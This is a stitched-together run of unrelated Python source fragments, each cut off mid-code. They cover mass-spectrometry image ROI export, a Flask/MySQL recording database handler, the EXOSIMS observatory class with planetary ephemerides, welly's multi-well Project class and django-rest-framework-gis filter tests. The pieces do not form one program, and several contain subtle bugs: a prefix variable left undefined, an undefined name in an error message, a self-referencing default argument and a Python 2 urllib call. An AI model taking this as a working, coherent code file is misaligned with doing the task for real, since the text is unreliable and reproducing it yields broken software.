(point_tab[['X']].values.min()-1,point_tab[['Y']].values.min()-1) bt_right = (point_tab[['X']].values.max()-1,point_tab[['Y']].values.max()-1) #Draw rectangle on the mask using opencv cv2.rectangle(img=mask,pt1=tp_left,pt2=bt_right,color=(255,255,255),thickness=-1) #Check to see if inverting the mask if invert: mask = ~mask #return the mask return mask def ROImaskExport(ROI_masks,full_img,flip_horz=False,flip_vert=False,prefix=None,export_image=True): """Function for exporting ROIs from an ROI_masks dictionary object that gets returned from GetROImask function ROI_masks: Returned dictionary from GetROImask function full_img: Array that contains the image to be cropped from flip_horz: Logical. If true, ROI is flipped horizontally flip_vert: Logical. If true, ROI is flipped vertically prefix: prefix to add to the ROIs that are exported. If left to None, then a default prefix is added that corresponds to the image folder that the ROI represents""" #Set your home directory tmp = Path('..') home_dir=tmp.cwd() #Create a dictionary of final rescaled sizes to use for MSI ROI Extraction fin_sizes = {} #Loop through the ROI_masks dictionary for ROI,mask in ROI_masks.items(): os.chdir(str(ROI)) #Read the imc image for resizing imc_im=mms.imc_file(tmp.cwd(),return_im=True,return_imc_cell_table=False,return_pix_table=False).image #Get our ROIs tmp_ROI = full_img[int(mask[2]):int(mask[3]),int(mask[0]):int(mask[1])] #Save the new ROI if flip_horz: tmp_ROI = np.flip(tmp_ROI,0) if flip_vert: tmp_ROI = np.flip(tmp_ROI,1) #Get the size of the imc image multiple = int(imc_im.shape[1]/tmp_ROI.shape[0]) #Use the rounded multiple to resize our ROI for image registration HiRes_size = (tmp_ROI.shape[1]*multiple,tmp_ROI.shape[0]*multiple) #Remember that cv2 does the axis in the opposite order as numpy tmp_ROI_HR = cv2.resize(tmp_ROI,HiRes_size) #Create a nifti object and save the image nifti_ROI = nib.Nifti1Image(tmp_ROI_HR, affine=np.eye(4)) #Get a prefix for the image that we are saving if prefix is None: prefix_tmp = str(ROI) else: prefix = prefix if export_image: #Save the ROI nib.save(nifti_ROI,prefix_tmp+'.nii') #Report the finished job print('Finished exporting '+str(ROI)+'...') #Add the final size to our dictionary fin_sizes.update({str(ROI):HiRes_size}) #Change back to the original directory os.chdir(home_dir) #Report the finished export job print('Finsihed export all regions') #Return an object that contains the final size for each H&E ROI so we can apply the #transformix function for each MSI ROI return fin_sizes def ROImaskExport_MSI_Transformix(ROI_masks_from_tolBlue,final_sizes,parameter_files,full_img,flip_horz=False,flip_vert=False,prefix=None): """Function for exporting ROIs from an ROI_masks dictionary object that gets returned from GetROImask function ROI_masks: Returned dictionary from GetROImask function full_img: Array that contains the image to be cropped from flip_horz: Logical. If true, ROI is flipped horizontally flip_vert: Logical. If true, ROI is flipped vertically prefix: prefix to add to the ROIs that are exported. If left to None, then a default prefix is added that corresponds to the image folder that the ROI represents""" #Set your home directory tmp = Path('..') home_dir=tmp.cwd() #Loop through the ROI_masks dictionary for ROI,mask in ROI_masks_from_tolBlue.items(): #Create a directory for our ROI and switch to it if not os.path.exists(os.path.join(tmp.cwd(),str(ROI))): os.makedirs(str(ROI)) os.chdir(str(ROI)) #Get our ROIs tmp_ROI = full_img[int(mask[2]):int(mask[3]),int(mask[0]):int(mask[1])] #Save the new ROI if flip_horz: tmp_ROI = np.flip(tmp_ROI,0) if flip_vert: tmp_ROI = np.flip(tmp_ROI,1) #Use the dictionary of ROI final sizes to resize the image HiRes_size = final_sizes[str(ROI)] #Resize the image tmp_ROI_HR = cv2.resize(tmp_ROI,HiRes_size) #Create a nifti object and save the image nifti_ROI = nib.Nifti1Image(tmp_ROI_HR, affine=np.eye(4)) #Get a prefix for the image that we are saving (will come from the loop that indicates m/z slice) prefix = prefix #Save the ROI nib.save(nifti_ROI,prefix+'.nii') #Report the finished job print('Finished exporting original crop for '+str(ROI)+'...') #Run transformix on this particular ROI using the false H&E and H&E registration parameters tmp_imagepath = Path(os.path.join(tmp.cwd(),str(prefix)+'.nii')) #Create a directory to store this slice in within each ROIs folder os.mkdir(str(prefix)) #Create an output directory path (here tmp.cwd() is the ROI folder and prefix
# Copyright 2016 The Eyra Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # File author/s: # <NAME> <<EMAIL>> # <NAME> <<EMAIL>> (getRecordingsInfo) from flask_mysqldb import MySQL from MySQLdb import Error as MySQLError import json import os import random from util import log, filename from config import dbConst, RECSURL class DbHandler: def __init__(self, app): # MySQL configurations app.config['MYSQL_HOST'] = dbConst['host'] app.config['MYSQL_USER'] = dbConst['user'] app.config['MYSQL_DB'] = dbConst['db'] app.config['MYSQL_USE_UNICODE'] = dbConst['use_unicode'] app.config['MYSQL_CHARSET'] = dbConst['charset'] self.mysql = MySQL(app) # path to saved recordings self.recordings_path = app.config['MAIN_RECORDINGS_PATH'] # needed to sanitize the dynamic sql creation in insertGeneralData # keep a list of allowed column names for insertions etc. depending on the table (device, isntructor, etc) self.allowedColumnNames = { 'device': [ 'userAgent', 'imei' ], 'instructor': [ 'name', 'email', 'phone', 'address' ], 'speaker': [ 'name', 'deviceImei' ], 'speaker_info': [ 'speakerId', 's_key', 's_value' ] } # generate list of currently valid tokens according to 'valid' column in table token. #self.invalid_token_ids = self.getInvalidTokenIds() # messes up WSGI script for some fucking reason self.invalid_token_ids = None def getInvalidTokenIds(self): """ Returns a list of tokenId's who are marked with valid=FALSE in database. """ cur = self.mysql.connection.cursor() cur.execute('SELECT id FROM token WHERE valid=FALSE') return [row[0] for row in cur.fetchall()] def insertGeneralData(self, name, data, table): """ inserts data into appropriate table name is i.e. 'instructor' and is a representation of the data, for errors and general identification data is a json object whose keys will be used as table column names and those values will be inserted into table returns the id of the newly inserted row or errors in the format dict(msg=id or msg, statusCode=htmlStatusCode) Example: name='device' data = {'imei':245, 'userAgent':'Mozilla'} table = 'device' In which case, this function will insert into device (imei, userAgent) values ('245','Mozilla') and return said rows newly generated id. WARNING: appends the keys of data straight into a python string using % so at least this should be sanitized. Sanitized by a whitelist of allowed keys in self.allowedColumnNames """ keys = [] vals = [] dataId = None try: if isinstance(data, str): data = json.loads(data) for key, val in data.items(): # use data.iteritems() for python 2.7 # allow only keys from the appropriate list in self.allowedColumnNames if key not in self.allowedColumnNames[name]: raise KeyError('Unallowed column name used! Did someone hack the frontend? name: %s' % key) keys.append(key) vals.append(val) data = None # data is untrusted, should not be used unless it's filtered except (KeyError, TypeError, ValueError) as e: msg = '%s data not on correct format, aborting.' % name log(msg, e) return dict(msg=msg, statusCode=400) try: # insert into table cur = self.mysql.connection.cursor() # make our query something like (with 4 key/value pairs) # 'INSERT INTO %s (%s, %s, %s, %s) \ # VALUES (%s, %s, %s, %s)', # depending on number of data keys/values queryStr = 'INSERT INTO %s (' queryStrMid = '' # since we can reuse the (%s,%s,...) for i in range(len(keys)): queryStrMid += '%s' if (i != len(keys) - 1): queryStrMid += ', ' queryStr += queryStrMid queryStr += ') ' # input the keys first, because we don't want the '' quotes that cur.execute # automatically puts there queryStr = queryStr % tuple([table] + keys) queryStr += 'VALUES (' queryStr += queryStrMid queryStr += ')' # make the replacement tuple which is set in place of the %s's in the query queryTuple = tuple(vals) cur.execute(queryStr, queryTuple) # get the newly auto generated id # create our query something like # 'SELECT id FROM %s WHERE \ # %s=%s AND %s=%s AND %s=%s AND %s=%s' # but now the order is WHERE key=val AND key1=val1 and so # we have to interleave our lists instead of appending them # to get the correct order interleavedList = [] for i in range(len(keys)): interleavedList.append(keys[i]) # just a hack, because of the quote thing mentioned above # will be replaces with vals in query interleavedList.append('%s') queryStr = 'SELECT id FROM %s WHERE ' for i in range(len(keys)): queryStr += '%s=%s' if (i != len(keys) - 1): queryStr += ' AND ' queryStr = queryStr % tuple([table] + interleavedList) cur.execute(queryStr, queryTuple) # return highest id in case of multiple results (should be the newest entry) dataIds = cur.fetchall() dataId = max([i[0] for i in dataIds]) # fetchall() returns a list of tuples # only commit if we had no exceptions until this point self.mysql.connection.commit() except MySQLError as e: msg = 'Database error.' log(msg, e) return dict(msg=msg, statusCode=500) if dataId is None: msg = 'Couldn\'t get %s id.' % name log(msg) return dict(msg=msg, statusCode=500) else: return dict(msg='{"%sId":' % name + str(dataId) + '}', statusCode=200) def insertSpeakerData(self, speakerData, speakerInfo): """ inserts into both speaker and speaker_info speakerData is the {'name':name[, 'deviceImei':deviceImei]} speakerInfo are the extra info values to insert into speaker_info table, e.g. speakerInfo: {'height':'154', etc.} assumes speaker doesn't exist in database. """ speakerId = None res = self.insertGeneralData('speaker', speakerData, 'speaker') if 'speakerId' in res['msg']: speakerId = json.loads(res['msg'])['speakerId'] else: return res for k, v in speakerInfo.items(): self.insertGeneralData('speaker_info', { 'speakerId':speakerId, 's_key':k, 's_value':v }, 'speaker_info') return res def processInstructorData(self, instructorData): """ instructorData = look at format in the client-server API """ try: if isinstance(instructorData, str): instructorData = json.loads(instructorData) except (ValueError) as e: msg = '%s data not on correct format, aborting.' % name log(msg, e) return dict(msg=msg, statusCode=400) if 'id' in instructorData: # instructor was submitted as an id, see if he exists in database try: cur = self.mysql.connection.cursor() cur.execute('SELECT id FROM instructor WHERE id=%s', (instructorData['id'],)) # have to pass in a tuple, with only one parameter instructorId = cur.fetchone() if (instructorId is None): # no instructor msg = 'No instructor with that id.' log(msg) return dict(msg=msg, statusCode=400) else: # instructor already exists, return it instructorId = instructorId[0] # fetchone returns tuple on success return dict(msg='{"instructorId":' + str(instructorId) + '}', statusCode=200) except MySQLError as e: msg = 'Database error.' log(msg, e) return dict(msg=msg, statusCode=500) return 'Unexpected error.', 500 return self.insertGeneralData('instructor', instructorData, 'instructor') def processDeviceData(self, deviceData): # we have to make sure not to insert device with same IMEI # as is already in the database if so. Otherwise, we create new device deviceImei, deviceId, userAgent = None, None, None try: if isinstance(deviceData, str): deviceData = json.loads(deviceData) userAgent = deviceData['userAgent'] except (TypeError, ValueError, KeyError) as e: msg = 'Device data not on correct format, aborting.' log(msg, e) return dict(msg=msg, statusCode=400) try: deviceImei = deviceData['imei'] except (KeyError) as e: # we don't care if device has no ['imei'] pass try: deviceId = deviceData['deviceId'] del deviceData['deviceId'] # delete it, we don't want to insert it into database except (KeyError) as e: # we don't care if device has no ['deviceId'] pass if deviceImei is not None and deviceImei != '': try: cur = self.mysql.connection.cursor() # firstly, check if this device already exists, if so, update end time, otherwise add device cur.execute('SELECT id FROM device WHERE imei=%s', (deviceImei,)) # have to pass in a tuple, with only one parameter dbDeviceId = cur.fetchone() if (dbDeviceId is None): # no device with this imei in database, insert it return self.insertGeneralData('device', deviceData, 'device') else: # device already exists, return it dbDeviceId = dbDeviceId[0] # fetchone returns tuple on success return dict(msg='{"deviceId":' + str(dbDeviceId) + '}', statusCode=200) except MySQLError as e: msg = 'Database error.' log(msg, e) return dict(msg=msg, statusCode=500) # no imei present, won't be able to identify device unless he has his id if deviceId
<reponame>semaphoreP/EXOSIMS<gh_stars>0 # -*- coding: utf-8 -*- from EXOSIMS.util.vprint import vprint from EXOSIMS.util.eccanom import eccanom from EXOSIMS.util.get_dirs import get_cache_dir from EXOSIMS.util.get_dirs import get_downloads_dir import numpy as np import astropy.units as u import astropy.constants as const from astropy.time import Time try: import cPickle as pickle except: import pickle import hashlib import os import urllib class Observatory(object): """Observatory class template This class contains all variables and methods necessary to perform Observatory Definition Module calculations in exoplanet mission simulation. Args: \*\*specs: user specified values spkpath (str): Path to SPK file on disk (Defaults to de432s.bsp). Attributes: koAngleMin (astropy Quantity): Telescope minimum keepout angle in units of deg koAngleMinMoon (astropy Quantity): Telescope minimum keepout angle in units of deg, for the Moon only koAngleMinEarth (astropy Quantity): Telescope minimum keepout angle in units of deg, for the Earth only koAngleMax (astropy Quantity): Telescope maximum keepout angle (for occulter) in units of deg koAngleSmall (astropy Quantity): Telescope keepout angle for smaller (angular size) bodies in units of deg settlingTime (astropy Quantity): Instrument settling time after repoint in units of day thrust (astropy Quantity): Occulter slew thrust in units of mN slewIsp (astropy Quantity): Occulter slew specific impulse in units of s scMass (astropy Quantity): Occulter (maneuvering sc) wet mass in units of kg dryMass (astropy Quantity): Occulter (maneuvering sc) dry mass in units of kg coMass (astropy Quantity): Telescope (non-maneuvering sc) mass in units of kg occulterSep (astropy Quantity): Occulter-telescope distance in units of km skIsp (astropy Quantity): Station-keeping specific impulse in units of s defburnPortion (float): Default burn portion flowRate (astropy Quantity): Slew flow rate in units of kg/day checkKeepoutEnd (boolean): Boolean signifying if the keepout method must be called at the end of each observation forceStaticEphem (boolean): Boolean used to force static ephemerides constTOF (astropy Quantity 1x1 ndarray): Constant time of flight for single occulter slew in units of day maxdVpct (float): Maximum percentage of total on board fuel used for single starshade slew cachedir (str): Path to cache directory Notes: For finding positions of solar system bodies, this routine will attempt to use the jplephem module and a local SPK file on disk. The module can be installed via pip or from source. The default SPK file can be downloaded from here: http://naif.jpl.nasa.gov/pub/naif/generic_kernels/spk/planets/de432s.bsp and should be placed in the Observatory subdirectory of EXOSIMS. """ _modtype = 'Observatory' def __init__(self, koAngleMin=45, koAngleMinMoon=None, koAngleMinEarth=None, koAngleMax=None, koAngleSmall=1, ko_dtStep=1, settlingTime=1, thrust=450, slewIsp=4160, scMass=6000, dryMass=3400, coMass=5800, occulterSep=55000, skIsp=220, defburnPortion=0.05, constTOF=14, maxdVpct=0.02, spkpath=None, checkKeepoutEnd=True, forceStaticEphem=False, occ_dtmin=10, occ_dtmax=61, cachedir=None, **specs): #start the outspec self._outspec = {} # load the vprint function (same line in all prototype module constructors) self.vprint = vprint(specs.get('verbose', True)) # validate inputs assert isinstance(checkKeepoutEnd, bool), "checkKeepoutEnd must be a boolean." assert isinstance(forceStaticEphem, bool), "forceStaticEphem must be a boolean." # default Observatory values self.koAngleMin = koAngleMin*u.deg # keepout minimum angle koAngleMinMoon = koAngleMin if koAngleMinMoon is None else koAngleMinMoon self.koAngleMinMoon = koAngleMinMoon*u.deg # keepout minimum angle: Moon-only koAngleMinEarth = koAngleMin if koAngleMinEarth is None else koAngleMinEarth self.koAngleMinEarth = koAngleMinEarth*u.deg# keepout minimum angle: Earth-only self.koAngleMax = koAngleMax*u.deg if koAngleMax is not None else koAngleMax # keepout maximum angle (occulter) self.koAngleSmall = koAngleSmall*u.deg # keepout angle for smaller bodies self.ko_dtStep = ko_dtStep*u.d # time step for generating koMap of stars (day) self.settlingTime = settlingTime*u.d # instru. settling time after repoint self.thrust = thrust*u.mN # occulter slew thrust (mN) self.slewIsp = slewIsp*u.s # occulter slew specific impulse (s) self.scMass = scMass*u.kg # occulter initial (wet) mass (kg) self.dryMass = dryMass*u.kg # occulter dry mass (kg) self.coMass = coMass*u.kg # telescope mass (kg) self.occulterSep = occulterSep*u.km # occulter-telescope distance (km) self.skIsp = skIsp*u.s # station-keeping Isp (s) self.defburnPortion = float(defburnPortion) # default burn portion self.checkKeepoutEnd = bool(checkKeepoutEnd)# true if keepout called at obs end self.forceStaticEphem = bool(forceStaticEphem)# boolean used to force static ephem self.constTOF = np.array([constTOF])*u.d # starshade constant slew time (days) self.occ_dtmin = occ_dtmin*u.d # Minimum occulter slew time (days) self.occ_dtmax = occ_dtmax*u.d # Maximum occulter slew time (days) self.maxdVpct = maxdVpct # Maximum deltaV percent # find the cache directory self.cachedir = get_cache_dir(cachedir) # find amount of fuel on board starshade and an upper bound for single slew dV self.dVtot = self.slewIsp*const.g0*np.log(self.scMass/self.dryMass) self.dVmax = self.dVtot * self.maxdVpct # set values derived from quantities above # slew flow rate (kg/day) self.flowRate = (self.thrust/const.g0/self.slewIsp).to('kg/day') # if jplephem is available, we'll use that for propagating solar system bodies # otherwise, use static ephemerides if self.forceStaticEphem is False: try: from jplephem.spk import SPK self.havejplephem = True except ImportError: self.vprint("WARNING: Module jplephem not found, " \ + "using static solar system ephemerides.") self.havejplephem = False else: self.havejplephem = False self.vprint("Using static solar system ephemerides.") # populate outspec for att in self.__dict__.keys(): if att not in ['vprint','_outspec']: dat = self.__dict__[att] self._outspec[att] = dat.value if isinstance(dat, u.Quantity) else dat # define function for calculating obliquity of the ecliptic # (arg Julian centuries from J2000) self.obe = lambda TDB: 23.439279 - 0.0130102*TDB - 5.086e-8*(TDB**2) + \ 5.565e-7*(TDB**3) + 1.6e-10*(TDB**4) + 1.21e-11*(TDB**5) # if you have jplephem, load spice file, otherwise load static ephem if self.havejplephem: if (spkpath is None) or not(os.path.exists(spkpath)): # if the path does not exist, load the default de432s.bsp filename = 'de432s.bsp' downloadsdir = get_downloads_dir() spkpath = os.path.join(downloadsdir, filename) # attempt to fetch ephemeris and cache locally in $Home/.EXOSIMS/downloads/ if not os.path.exists(spkpath) and os.access(downloadsdir, os.W_OK|os.X_OK): spk_on_web = 'https://naif.jpl.nasa.gov/pub/naif/generic_kernels/spk/planets/de432s.bsp' self.vprint("Fetching planetary ephemeris from %s to %s" % (spk_on_web, spkpath)) try: urllib.urlretrieve(spk_on_web, spkpath) except: # Note: the SPK.open() below will fail in this case self.vprint("Error: Remote fetch failed. Fetch manually or see install instructions.") self.kernel = SPK.open(spkpath) else: """All ephemeride data from Vallado Appendix D.4 Values are: a = sma (AU), e = eccentricity, I = inclination (deg), O = long. ascending node (deg), w = long. perihelion (deg), lM = mean longitude (deg) """ # store ephemerides data in heliocentric true ecliptic frame a = 0.387098310 e = [0.20563175, 0.000020406, -0.0000000284, -0.00000000017] I = [7.004986, -0.0059516, 0.00000081, 0.000000041] O = [48.330893, -0.1254229, -0.00008833, -0.000000196] w = [77.456119, 0.1588643, -0.00001343, 0.000000039] lM = [252.250906, 149472.6746358, -0.00000535, 0.000000002] Mercury = self.SolarEph(a, e, I, O, w, lM) a = 0.723329820 e = [0.00677188, -0.000047766, 0.0000000975, 0.00000000044] I = [3.394662, -0.0008568, -0.00003244, 0.000000010] O = [76.679920, -0.2780080, -0.00014256, -0.000000198] w = [131.563707, 0.0048646, -0.00138232, -0.000005332] lM = [181.979801, 58517.8156760, 0.00000165, -0.000000002] Venus = self.SolarEph(a, e, I, O, w, lM) a = 1.000001018 e = [0.01670862, -0.000042037, -0.0000001236, 0.00000000004] I = [0., 0.0130546, -0.00000931, -0.000000034] O = [174.873174, -0.2410908, 0.00004067, -0.000001327] w = [102.937348, 0.3225557, 0.00015026, 0.000000478] lM = [100.466449, 35999.3728519, -0.00000568, 0.] Earth = self.SolarEph(a, e, I, O, w, lM) a = 1.523679342 e = [0.09340062, 0.000090483, -0.0000000806, -0.00000000035] I = [1.849726, -0.0081479, -0.00002255, -0.000000027] O = [49.558093, -0.2949846, -0.00063993, -0.000002143] w = [336.060234, 0.4438898, -0.00017321, 0.000000300] lM = [355.433275, 19140.2993313, 0.00000261, -0.000000003] Mars = self.SolarEph(a, e, I, O, w, lM) a = [5.202603191, 0.0000001913] e = [0.04849485, 0.000163244, -0.0000004719, -0.00000000197] I = [1.303270, -0.0019872, 0.00003318, 0.000000092] O = [100.464441, 0.1766828, 0.00090387, -0.000007032] w = [14.331309, 0.2155525, 0.00072252, -0.000004590] lM = [34.351484, 3034.9056746, -0.00008501, 0.000000004] Jupiter = self.SolarEph(a, e, I, O, w, lM) a = [9.554909596, -0.0000021389] e = [0.05550862, -0.000346818, -0.0000006456, 0.00000000338] I = [2.488878, 0.0025515, -0.00004903, 0.000000018] O = [113.665524, -0.2566649, -0.00018345, 0.000000357] w = [93.056787, 0.5665496, 0.00052809, 0.000004882] lM = [50.077471, 1222.1137943, 0.00021004, -0.000000019] Saturn = self.SolarEph(a, e, I, O, w, lM) a = [19.218446062, -0.0000000372, 0.00000000098] e = [0.04629590, -0.000027337, 0.0000000790, 0.00000000025] I = [0.773196, -0.0016869, 0.00000349, 0.000000016] O = [74.005947, 0.0741461, 0.00040540, 0.000000104] w = [173.005159, 0.0893206, -0.00009470, 0.000000413] lM = [314.055005, 428.4669983, -0.00000486, 0.000000006] Uranus = self.SolarEph(a, e, I, O, w, lM) a =
<reponame>agilescientific/welly<gh_stars>1-10 """ Defines a multi-well 'project'. :copyright: 2021 Agile Scientific :license: Apache 2.0 """ from __future__ import print_function import glob from collections import Counter from urllib.parse import non_hierarchical import warnings import numpy as np import pandas as pd from tqdm import tqdm from .well import Well, WellError from . import utils from .utils import deprecated from .plot import plot_kdes_project, plot_map_project class Project(object): """ Just a list of Well objects. One day it might want its own CRS, but then we'd have to cast the CRSs of the contained data. """ def __init__(self, list_of_Wells, source=''): self.alias = {} self.source = source self.__list = list_of_Wells self.__index = 0 def __repr__(self): s = [str(w.uwi) for w in self.__list] return "Project({} wells: {})".format(len(self), ', '.join(s)) def __str__(self): s = [str(w.uwi) for w in self.__list] return '\n'.join(s) def __getitem__(self, key): if isinstance(key, slice): i = key.indices(len(self.__list)) result = [self.__list[n] for n in range(*i)] return Project(result) elif isinstance(key, list): result = [] for j in key: result.append(self.__list[j]) return Project(result) else: return self.__list[key] def __setitem__(self, key, value): self.__list[key] = value def __delitem__(self, key): del(self.__list[key]) def __iter__(self): for w in self.__list: yield w def __len__(self): return len(list(self.__list)) def __contains__(self, item): if isinstance(item, Well): for d in self.__list: if item == d: return True return False def __add__(self, other): if isinstance(other, self.__class__): result = self.__list + other.__list return Project(result) elif isinstance(other, Well): result = self.__list + [other] return Project(result) else: raise WellError("You can only add legends or decors.") def _repr_html_(self): """ Jupyter Notebook magic repr function. """ # Make header. r = '</th><th>'.join(['Index', 'UWI', 'Data', 'Curves']) rows = '<tr><th>{}</th></tr>'.format(r) # Make rows. for i, w in enumerate(self.__list): rows += '<tr><td>{}</td>'.format(i) rows += '<td><strong>{}</strong></td>'.format(w.uwi) rows += '<td>{}&nbsp;curves</td>'.format(len(w.data)) rows += '<td>{}</td></tr>'.format(', '.join(w.data.keys())) html = '<table>{}</table>'.format(rows) return html def pop(self, index): item = self.__list.pop(index) self.__index = 0 return item @property def uwis(self): """Returns the UWIs of the wells in the project.""" return [w.uwi for w in self.__list] @property def basis_range(self): """ Returns a tuple of the min and max of all the curves in the wells in the project. """ idx = self.df().index.get_level_values('DEPT') return idx.min(), idx.max() @classmethod def from_las(cls, path=None, remap=None, funcs=None, data=True, req=None, alias=None, max=None, encoding=None, printfname=None, index=None, **kwargs, ): """ Constructor. Essentially just wraps ``Well.from_las()``, but is more convenient for most purposes. Args: path (str or list): The path of the LAS files, e.g. ``./*.las`` (the default). It will attempt to load everything it finds, so make sure it only leads to LAS files. remap (dict): Optional. A dict of 'old': 'new' LAS field names. funcs (dict): Optional. A dict of 'las field': function() for implementing a transform before loading. Can be a lambda. data (bool): Whether to load curves or not. req (list): A list of alias names, giving all required curves. If not all of the aliases are present, the well is not loaded. alias (dict): The alias dict, e.g. ``alias = {'gamma': ['GR', 'GR1'], 'density': ['RHOZ', 'RHOB'], 'pants': ['PANTS']}`` max (int): The max number of wells to load. encoding (str): File encoding; passed to lasio. printfname (bool): prints filename before trying to load it, for debugging index (str): Optional. Either "existing" (use the index as found in the LAS file) or "m", "ft" to use lasio's conversion of the relevant index unit. Returns: project. The project object. """ if max is None: max = 1e12 if (req is not None) and (alias is None): raise WellError("You need to provide an alias dict as well as requirement list.") if path is None: uris = glob.glob('./*.[LlAaSs]') elif isinstance(path, str): uris = glob.glob(path) if not uris: # The glob produced nothing. # URLs to 'folders' (eg a bucket) are not supported. # If it's a non-existent file, we'll get an error later. uris = [path] else: uris = path # It's a list-like of files and/or URLs. wells = [Well.from_las(f, remap=remap, funcs=funcs, data=data, req=req, alias=alias, encoding=encoding, printfname=printfname, index=index, **kwargs, ) for i, f in tqdm(enumerate(uris)) if i < max] return cls(list(filter(None, wells))) def add_canstrat_striplogs(self, path, uwi_transform=None, name='canstrat'): """ This may be too specific a method... just move it to the workflow. Requires striplog. """ from striplog import Striplog uwi_transform = uwi_transform or utils.null for w in self.__list: try: dat_file = utils.find_file(str(uwi_transform(w.uwi)), path) except: print("- Skipping {}: something went wrong".format(w.uwi)) continue if dat_file is None: print("- Omitting {}: no data".format(w.uwi)) continue # If we got here, we're using it. print("+ Adding {} from {}".format(w.uwi, dat_file)) w.data[name] = Striplog.from_canstrat(dat_file) return def __all_curve_names(self, uwis=None, unique=True, count=False, nodepth=True): """ Utility function to get all curve names from all wells, regardless of data type or repetition. """ uwis = uwis or self.uwis c = utils.flatten_list([list(w.data.keys()) for w in self if w.uwi in uwis]) if nodepth: c = filter(lambda x: x not in ['DEPT', 'DEPTH'], c) if unique: if count: return Counter(c).most_common() else: return [i[0] for i in Counter(c).most_common()] return list(c) def get_mnemonics(self, mnemonics, uwis=None, alias=None): """ Looks at all the wells in turn and returns the highest thing in the alias table. Args: mnemonics (list) alias (dict) Returns: list. A list of lists. """ # Let's not do the nested comprehension... uwis = uwis or self.uwis wells = [w for w in self.__list if w.uwi in uwis] all_wells = [] for w in wells: this_well = [w.get_mnemonic(m, alias=alias) for m in mnemonics] all_wells.append(this_well) return all_wells def count_mnemonic(self, mnemonic, uwis=uwis, alias=None): """ Counts the wells that have a given curve, given the mnemonic and an alias dict. """ all_mnemonics = self.get_mnemonics([mnemonic], uwis=uwis, alias=alias) return len(list(filter(None, utils.flatten_list(all_mnemonics)))) def curve_table_html(self, uwis=None, keys=None, alias=None, tests=None, exclude=None, limit=0): """ Another version of the curve table. Args: uwis (list): Only these UWIs. List of ``str``. keys (list): Only these names. List of ``str``. alias (dict): Alias table, maps names to mnemomnics in order of preference. tests (dict): Test table, maps names to lists of functions. exclude (list): Except these names. List of ``str``. Ignored if you pass ``keys``. limit (int): Curve must be present in at least this many wells. Returns: str. HTML representation of the table. """ uwis = uwis or self.uwis wells = [w for w in self.__list if w.uwi in uwis] # This is hacky. See remark in well.get_mnemonics_from_regex(). if exclude is not None: exclude = utils.flatten_list([w.get_mnemonics_from_regex(e) for e in exclude for w in wells]) if alias is not None: exclude = [alias.get(e, e) for e in exclude] else: exclude = [] counter = self.__all_curve_names(uwis=uwis, count=True) all_keys = [i[0] for i in counter if (i[0] not in exclude) and (i[1] >= limit)] keys = utils.flatten_list(keys) or all_keys tests = tests or {} alias = alias or self.alias # Make header. keys_ = [k + '*' if k in alias else k for k in keys] r = '</th><th>'.join(['Idx', 'UWI', 'Data', 'Passing'] + keys_) rows = '<tr><th>{}</th></tr>'.format(r) # Make summary row. well_counts = [self.count_mnemonic(m, uwis=uwis, alias=alias) for m in keys] w = len(wells) well_count_strs = ['{}/{}&nbsp;wells'.format(c, w) for c in well_counts] r = '</td><td>'.join(['', '', '', '%'] + well_count_strs) rows += '<tr><td>{}</td></tr>'.format(r) q_colours = { 0: '#FF3333', 1: '#33EE33', -1: '#AACCAA' # default: '#FFFFCC' # Done with get when we use this dict. } # Make rows. for i, w in enumerate(wells): this_well = [w.get_curve(m, alias=alias) for m in keys] q_well = w.qc_data(tests, keys=keys, alias=alias) curves = [] q_total, q_count = 0, 0 for c in this_well: q = -1 num_tests, num_passes = 0, 0 if c is None: curves.append(('#CCCCCC', '', '', '#CCCCCC', '', '')) else: if tests: q_this = q_well.get(c.mnemonic) if q_this: results = q_this.values() if results: num_tests = len(results) num_passes = sum(results) q = num_passes / num_tests q_colour = q_colours.get(q, '#FFCC33') c_mean = '{:.2f}'.format(float(np.nanmean(c.df.values))) if np.any(c.df.values[~np.isnan(c.df.values)]) else np.nan curves.append(('#CCEECC', c.mnemonic, f"{num_passes}/{num_tests}", q_colour, c_mean, c.units)) q_total += num_passes q_count += num_tests # Make general columns. count = w.count_curves(keys, alias) if count == 0: score = '–' else: score = '{:.0f}'.format(100 * (q_total / q_count)) if (q_total >= 0) and (q_count > 0) else '–' s =
import json import urllib from unittest import skipIf from django.conf import settings from django.contrib.gis.geos import GEOSGeometry, Polygon from django.test import TestCase try: from django.urls import reverse except ImportError: from django.core.urlresolvers import reverse from .models import Location from .views import ( GeojsonLocationContainedInBBoxList, GeojsonLocationOrderDistanceToPointList, GeojsonLocationWithinDistanceOfPointList, ) has_spatialite = ( settings.DATABASES['default']['ENGINE'] == 'django.contrib.gis.db.backends.spatialite' ) try: has_geometry_distance = True except ImportError: has_geometry_distance = False class TestRestFrameworkGisFilters(TestCase): """ unit tests for filters feature in restframework_gis """ def setUp(self): self.location_contained_in_bbox_list_url = reverse( 'api_geojson_location_list_contained_in_bbox_filter' ) self.location_overlaps_bbox_list_url = reverse( 'api_geojson_location_list_overlaps_bbox_filter' ) self.location_contained_in_tile_list_url = reverse( 'api_geojson_location_list_contained_in_tile_filter' ) self.location_overlaps_tile_list_url = reverse( 'api_geojson_location_list_overlaps_tile_filter' ) self.location_within_distance_of_point_list_url = reverse( 'api_geojson_location_list_within_distance_of_point_filter' ) self.location_within_degrees_of_point_list_url = reverse( 'api_geojson_location_list_within_degrees_of_point_filter' ) self.geojson_contained_in_geometry = reverse( 'api_geojson_contained_in_geometry' ) self.location_order_distance_to_point = reverse( 'api_geojson_location_order_distance_to_point_list_filter' ) treasure_island_geojson = """{ "type": "Polygon", "coordinates": [ [ [ -122.44640350341795, 37.86103094116189 ], [ -122.44262695312501, 37.85506751416839 ], [ -122.43481636047363, 37.853305500228025 ], [ -122.42975234985352, 37.854660899304704 ], [ -122.41953849792479, 37.852627791344894 ], [ -122.41807937622069, 37.853305500228025 ], [ -122.41868019104004, 37.86211514878027 ], [ -122.42391586303711, 37.870584971740065 ], [ -122.43035316467285, 37.8723465726078 ], [ -122.43515968322752, 37.86963639998042 ], [ -122.43953704833984, 37.86882332875222 ], [ -122.44640350341795, 37.86103094116189 ] ] ] }""" self.treasure_island_geom = GEOSGeometry(treasure_island_geojson) ggpark_geojson = """{ "type": "Polygon", "coordinates": [ [ [ -122.5111198425293, 37.77125750792944 